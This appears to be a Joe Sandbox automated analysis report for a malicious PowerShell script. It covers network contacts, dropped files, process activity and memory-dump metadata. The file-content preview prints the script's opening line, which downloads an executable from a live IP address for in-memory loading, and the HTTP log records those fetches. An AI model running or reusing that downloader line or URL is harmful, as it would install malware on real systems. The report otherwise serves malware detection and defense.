        • URL Reputation: safe
        unknown
        https://aka.ms/pscore68powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://217.195.153.196powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2159022873.0000019943B6E000.00000004.00000800.00020000.00000000.sdmpfalse
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            217.195.153.196
            unknownNetherlands
            395092SHOCK-1USfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1542345
            Start date and time:2024-10-25 20:04:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 35s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:1ZhE3yY8rV.ps1
            renamed because original name is a hash value
            Original Sample Name:e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908.ps1
            Detection:MAL
            Classification:mal64.evad.winPS1@3/10@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 80%
            • Number of executed functions: 2
            • Number of non-executed functions: 1
            Cookbook Comments:
            • Found application associated with file extension: .ps1
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.182.143.212
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: 1ZhE3yY8rV.ps1
            TimeTypeDescription
            14:05:09API Interceptor87x Sleep call for process: powershell.exe modified
            14:05:46API Interceptor1x Sleep call for process: WerFault.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            217.195.153.196sd2.ps1Get hashmaliciousAgentTesla, KoiLoaderBrowse
            • 217.195.153.196/index.php
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            SHOCK-1USsd2.ps1Get hashmaliciousAgentTesla, KoiLoaderBrowse
            • 217.195.153.196
            ZRemI0ixC6.dllGet hashmaliciousBumbleBeeBrowse
            • 144.208.127.113
            PWzQpJQHzb.msiGet hashmaliciousUnknownBrowse
            • 144.208.127.113
            Q6yuW8YIMR.dllGet hashmaliciousBumbleBeeBrowse
            • 144.208.127.113
            7rbJdaTZe2.dllGet hashmaliciousBumbleBeeBrowse
            • 144.208.127.113
            1JYlOOKImO.dllGet hashmaliciousBumbleBeeBrowse
            • 144.208.127.113
            bGvIeUxVdy.msiGet hashmaliciousUnknownBrowse
            • 144.208.127.113
            QsLhL1pw3t.msiGet hashmaliciousUnknownBrowse
            • 144.208.127.113
            BDncqpUxZl.dllGet hashmaliciousBumbleBeeBrowse
            • 144.208.127.113
            Midjourney.msiGet hashmaliciousUnknownBrowse
            • 144.208.127.113
            No context
            No context
            Process:C:\Windows\System32\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):1.558955984014268
            Encrypted:false
            SSDEEP:192:TnumG6O30kigMyja1Ub1FqGlJ0zuiF7Z24lO8b:DxGrEkigHjl1FqQJ0zuiF7Y4lO8b
            MD5:733A0531F66B50DA4162CDA4D777B18E
            SHA1:AF4B82AB763596ABE49E651A29D2C6E678B0EA3A
            SHA-256:B08B676F00C4368C2C85E821E549ABEB8A622ECABBD07B66CCDC1DEC61467F2A
            SHA-512:4FCEC2968BF451BFECFF14A4401073FD87A9985E95CB6039DEC3742765239999ED65F536859C08F4AB2FD3395B9264CC686E31AE13067196C7554DFC2F0098D1
            Malicious:false
            Reputation:low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.3.1.2.7.6.8.7.7.7.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.3.1.2.9.1.5.6.5.1.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.9.3.1.a.d.a.-.a.2.7.0.-.4.9.8.0.-.9.1.3.c.-.6.2.5.c.1.f.1.2.3.e.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.0.c.d.0.8.0.-.c.8.6.4.-.4.1.3.f.-.8.8.2.e.-.5.d.9.b.6.1.2.6.d.b.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.0.-.0.0.0.1.-.0.0.1.4.-.b.2.2.4.-.7.0.6.c.0.8.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.
            Process:C:\Windows\System32\WerFault.exe
            File Type:Mini DuMP crash report, 16 streams, Fri Oct 25 18:05:28 2024, 0x1205a4 type
            Category:dropped
            Size (bytes):854708
            Entropy (8bit):3.1336396177569283
            Encrypted:false
            SSDEEP:12288:easHzQ9qi3kCVmofVrUwqOo4QGWbjRbjS+bnKM:e1z+qeQZb8+bKM
            MD5:74E87F132A32C419FD963E5F59DD5C63
            SHA1:2DE488E355CD233067545B51C803A2E78ACA4D6E
            SHA-256:A272857CB4C780F0F9BD993D7C0E85671A5CD610A563867A7640C22B340DCC2E
            SHA-512:23437FB000718D22CED86448552A9E7F6251C35472C00EAA6034E1CFC0981E660B47A94C941795BF8416B170D2E060839454C799D927AD37BBB7A4E6D8E09512
            Malicious:false
            Reputation:low
            Preview:MDMP..a..... ..........g........................(-..........$...,9..........P9.........R...........l.......8...........T............q.............. X...........Z..............................................................................eJ.......Z......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\System32\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8838
            Entropy (8bit):3.702925014863333
            Encrypted:false
            SSDEEP:192:R6l7wVeJ9mZU56Y9fFBQZRgmfMS4bIpDO89bGkkfqim:R6lXJsE6Yl7sRgmfMSxGffm
            MD5:FC6A1616EE7790EC2A830EA3B07A7228
            SHA1:0B16DDA98019585514775F19BAB7285304520BE4
            SHA-256:A845EE9954AE3228545C2AAF2F3861D57B7D462D91B27F27C10BB8EC8113545E
            SHA-512:E313896887B608744CA394FA72B8AAFD16814EF2234141B45A44A9F3D2C45B62C39A4F999B222C4F856E1701FA67F04709E3B4019B5EDA75F602CAB185B0C5FE
            Malicious:false
            Reputation:low
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.5.2.<./.P.i.
            Process:C:\Windows\System32\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4764
            Entropy (8bit):4.491818414498126
            Encrypted:false
            SSDEEP:48:cvIwWl8zsJJg771I9LwrWpW8VYnYm8M4JQ9zOKFVByq85IcO1ytf1d:uIjfbI7kx7VfJQZPaKuf1d
            MD5:E02C66FF84630C022C0F11914B2E8A12
            SHA1:7B6ED26DE0B1649CA26AD12F6FD59D07EFD64E7D
            SHA-256:E8ED591D924DEC84DA0E08399CEAD00EF893C645844C7B5F6193C13861FBCE68
            SHA-512:262149B5E53C1C542A42EE5295D3BAF6C6068398FF4A7CC71EC04D0BC29EA7ACE56FE29E854B47EFFE8B8316803350237981CC5D7B194B125A5129AF696B948E
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):9434
            Entropy (8bit):4.928515784730612
            Encrypted:false
            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
            MD5:D3594118838EF8580975DDA877E44DEB
            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):6221
            Entropy (8bit):3.735396632859019
            Encrypted:false
            SSDEEP:96:CCj633CxHXEkvhkvCCt3mFUmeYHEmFUme/Hh:jj6y3A3RdRz
            MD5:141DFBA35787276FECA9DE9DE3151252
            SHA1:49B0122FF49BAF5757993460F4313BD5CBD7DCE0
            SHA-256:7C54D18B7011632214A04FB9B64583F1E09ACAC39F499D5A60C93E475D7F0B32
            SHA-512:7742A7F25FC42F7CE4554E83EFB7B7984E34946903F1A071CBCE3536C593E9A27D096D48DB2AC5ABEBAAA33B3C1997920DF7F01322385FEFD122EA96A7CA05AE
            Malicious:false
            Preview:...................................FL..................F.".. ...-/.v.....[.l.'..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....-.h.'.....l.'......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^YY.............................%..A.p.p.D.a.t.a...B.V.1.....YY....Roaming.@......CW.^YY..............................5.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^YY............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`..........................9..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^YY......Q...........
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):6221
            Entropy (8bit):3.735396632859019
            Encrypted:false
            SSDEEP:96:CCj633CxHXEkvhkvCCt3mFUmeYHEmFUme/Hh:jj6y3A3RdRz
            MD5:141DFBA35787276FECA9DE9DE3151252
            SHA1:49B0122FF49BAF5757993460F4313BD5CBD7DCE0
            SHA-256:7C54D18B7011632214A04FB9B64583F1E09ACAC39F499D5A60C93E475D7F0B32
            SHA-512:7742A7F25FC42F7CE4554E83EFB7B7984E34946903F1A071CBCE3536C593E9A27D096D48DB2AC5ABEBAAA33B3C1997920DF7F01322385FEFD122EA96A7CA05AE
            Malicious:false
            Preview:...................................FL..................F.".. ...-/.v.....[.l.'..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....-.h.'.....l.'......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^YY.............................%..A.p.p.D.a.t.a...B.V.1.....YY....Roaming.@......CW.^YY..............................5.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^YY............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`..........................9..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^YY......Q...........
            Process:C:\Windows\System32\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1835008
            Entropy (8bit):4.466482270464355
            Encrypted:false
            SSDEEP:6144:SIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:XXD94zWlLZMM6YFH6++
            MD5:4A1BEEDD0B1EE5A5A904F64E512C5AA9
            SHA1:3B5750CA516571F058A5B7E423DC703B3C435ED8
            SHA-256:E81C7002588788CF4DF0D63FC3B5FFAECBBE251A073E1CAFCB72482EF1302946
            SHA-512:7F53599FAD28AF07925E64F8DD9969EF37EA0A4FA3E25B363A071CDB555E44B8AC7D41E58196B1179149F21137063C4BA958C0D35B31C5DD55CEC0421C074F02
            Malicious:false
            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ|.x.'.................................................................................................................................................................................................................................................................................................................................................L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:ASCII text, with very long lines (4140), with CRLF line terminators
            Entropy (8bit):4.874594433956128
            TrID:
            • Generic INI configuration (1001/1) 100.00%
            File name:1ZhE3yY8rV.ps1
            File size:7'345 bytes
            MD5:ea20c34ae2665307c372d81bfe2effda
            SHA1:e384870516959d04dd002c52b0f16c30311eaf6f
            SHA256:e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908
            SHA512:58bc19475a77f5647213bf416ba758e91948bcc830d578126b8b134b78e3853c5bfce9a16847a0374849182c450b87346760010c589285271afbd2944390eebb
            SSDEEP:192:AvOuLf6+qUClbRZqwiJY5AH+W4BJeGZjf6H1XTMTqTb:AvQ+yo+yh
            TLSH:3CE17AE5BE1C45E419BB225CDF928882AD4DA67415F88505F6BE8C0BF79FE2480F0B0D
            File Content Preview:[Byte[]]$image = (IWR -UseBasicParsing 'http://217.195.153.196/assets/paleochorologyma.exe').Content;....function GDT..{.. Param.. (.. [OutputType([Type])].. .. [Parameter( Position = 0)].. [Type[]].. $Paramete
            Icon Hash:3270d6baae77db44
            TimestampSource PortDest PortSource IPDest IP
            Oct 25, 2024 20:05:11.103604078 CEST4973080192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:11.109039068 CEST8049730217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:11.109247923 CEST4973080192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:11.112966061 CEST4973080192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:11.118397951 CEST8049730217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:19.585613012 CEST8049730217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:19.585833073 CEST4973080192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:19.596493006 CEST4973080192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:19.599327087 CEST4973180192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:19.601845980 CEST8049730217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:19.604677916 CEST8049731217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:19.604758978 CEST4973180192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:19.604921103 CEST4973180192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:19.610229015 CEST8049731217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:28.085688114 CEST8049731217.195.153.196192.168.2.4
            Oct 25, 2024 20:05:28.085799932 CEST4973180192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:28.085984945 CEST4973180192.168.2.4217.195.153.196
            Oct 25, 2024 20:05:28.091379881 CEST8049731217.195.153.196192.168.2.4
            • 217.195.153.196
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449730217.195.153.196807552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 25, 2024 20:05:11.112966061 CEST187OUTGET /assets/paleochorologyma.exe HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
            Host: 217.195.153.196
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449731217.195.153.196807552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 25, 2024 20:05:19.604921103 CEST187OUTGET /assets/paleochorologyma.exe HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
            Host: 217.195.153.196
            Connection: Keep-Alive


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:14:05:07
            Start date:25/10/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:1
            Start time:14:05:07
            Start date:25/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:7
            Start time:14:05:27
            Start date:25/10/2024
            Path:C:\Windows\System32\WerFault.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
            Imagebase:0x7ff693b30000
            File size:570'736 bytes
            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:1.2%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:3
              Total number of Limit Nodes:0
              execution_graph 5640 7ffd9b76e278 5641 7ffd9b76e281 CreateThread 5640->5641 5643 7ffd9b76e353 5641->5643

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2188442316.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b760000_powershell.jbxd
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 4d3c8a018d430ac2430b2fa730997f59db2e7c64e970fb12e56e002f35f8bea6
              • Instruction ID: e4efb3819cf925d0aeba453c6d1217affe47a27a39302dd139467f0e5bfafbe3
              • Opcode Fuzzy Hash: 4d3c8a018d430ac2430b2fa730997f59db2e7c64e970fb12e56e002f35f8bea6
              • Instruction Fuzzy Hash: 83310C31A1CB4C8FDB1DEB5C98166E9BBE1FB59321F04426FE059C3192DA74685187C2

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000000.00000002.2188869907.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b830000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 504968948b8bee74205936742d333ec5afe52bc296cf513083ca6898595d224c
              • Instruction ID: 2b50da5bd3cf84cb7bf6192603cc67b2fa1dd496790e59a0bf47fc0b2f322139
              • Opcode Fuzzy Hash: 504968948b8bee74205936742d333ec5afe52bc296cf513083ca6898595d224c
              • Instruction Fuzzy Hash: 00D15872B0EB8E0FE765EBA844655B97BA0EF19314B1901FEE04DC72E3DA19A905C341
              Memory Dump Source
              • Source File: 00000000.00000002.2188442316.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b760000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77c8e773e7043f10c3495ca5e11bde5b2305f3cc7104d1bee384b19ee0664119
              • Instruction ID: b3247a5f51f5218f153e77b592991d48d1efa5c8f7c959242ea35c37cb230edd
              • Opcode Fuzzy Hash: 77c8e773e7043f10c3495ca5e11bde5b2305f3cc7104d1bee384b19ee0664119
              • Instruction Fuzzy Hash: 6B02B86BB0E7D28FE36356AD58B51D53FA0EF9322570E01F7C5C48E0B3E919194A8362